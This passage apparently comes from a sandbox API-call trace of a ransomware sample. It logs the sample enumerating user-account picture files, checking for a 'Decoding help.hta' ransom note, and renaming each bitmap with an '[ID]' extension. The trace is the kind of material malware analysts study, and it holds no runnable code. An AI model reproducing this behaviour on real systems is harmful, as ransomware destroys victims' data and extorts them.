Pictures\\Default Pictures\\*.*") returned 71 [0053.981] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.981] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile11.bmp") returned -1 [0053.981] lstrlenW (lpString="usertile11.bmp") returned 14 [0053.981] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.981] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.981] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile11.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" [0053.981] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" [0053.981] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.981] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile11.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.981] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2755d1, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2755d1, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb6d3417, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0053.981] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.981] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.981] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.981] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.981] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile12.bmp") returned -1 [0053.981] lstrlenW (lpString="usertile12.bmp") returned 14 [0053.981] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.981] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.981] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile12.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" [0053.982] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" [0053.982] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.982] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile12.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile12.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.982] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae29b72e, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae29b72e, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb76b98f, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xbeb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile13.bmp", cAlternateFileName="")) returned 1 [0053.982] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.982] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.982] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.982] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.982] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile13.bmp") returned -1 [0053.982] lstrlenW (lpString="usertile13.bmp") returned 14 [0053.982] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.982] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.982] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile13.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" [0053.982] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" [0053.983] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile13.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile13.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.983] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb82a065, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile14.bmp", cAlternateFileName="")) returned 1 [0053.983] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.983] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.983] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.983] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.983] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile14.bmp") returned -1 [0053.983] lstrlenW (lpString="usertile14.bmp") returned 14 [0053.983] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.983] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.983] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile14.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" [0053.983] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" [0053.983] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.983] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile14.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile14.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.984] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2e79e8, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2e79e8, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdbb95fd7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile15.bmp", cAlternateFileName="")) returned 1 [0053.984] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.984] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.984] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.984] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.984] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile15.bmp") returned -1 [0053.984] lstrlenW (lpString="usertile15.bmp") returned 14 [0053.984] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.984] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.984] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile15.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" [0053.984] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" [0053.984] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.984] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile15.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile15.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.985] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae30db45, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae30db45, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdca9c9ed, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile16.bmp", cAlternateFileName="")) returned 1 [0053.985] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.985] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.985] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.985] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile16.bmp") returned -1 [0053.985] lstrlenW (lpString="usertile16.bmp") returned 14 [0053.985] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.985] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.985] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile16.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" [0053.985] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" [0053.985] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.985] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile16.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.985] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc3f8f7, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile17.bmp", cAlternateFileName="")) returned 1 [0053.985] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.985] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.985] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" [0053.985] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\decoding help.hta")) returned 0x2020 [0053.985] lstrcmpiW (lpString1="Decoding help.hta", lpString2="usertile17.bmp") returned -1 [0053.985] lstrlenW (lpString="usertile17.bmp") returned 14 [0053.985] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.986] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.986] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="usertile17.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" [0053.986] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" [0053.986] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.[ID]g9uZrLhJaygpwRm1[ID]" [0053.986] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\programdata\\microsoft\\user account pictures\\default pictures\\usertile17.bmp.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.986] FindNextFileW (in: hFindFile=0x671170, lpFindFileData=0x1699fd30 | out: lpFindFileData=0x1699fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae333ca2, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae333ca2, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdcc65a55, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0x0, dwReserved1=0x0, cFileName="usertile18.bmp", cAlternateFileName="")) returned 1 [0053.986] lstrcpyW (in: lpString1=0x10d4eaa8, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*" [0053.986] lstrlenW (lpString="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\*.*") returned 71 [0053.986] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\User Account Pictures\\Default Pictures\\Decoding help.hta") 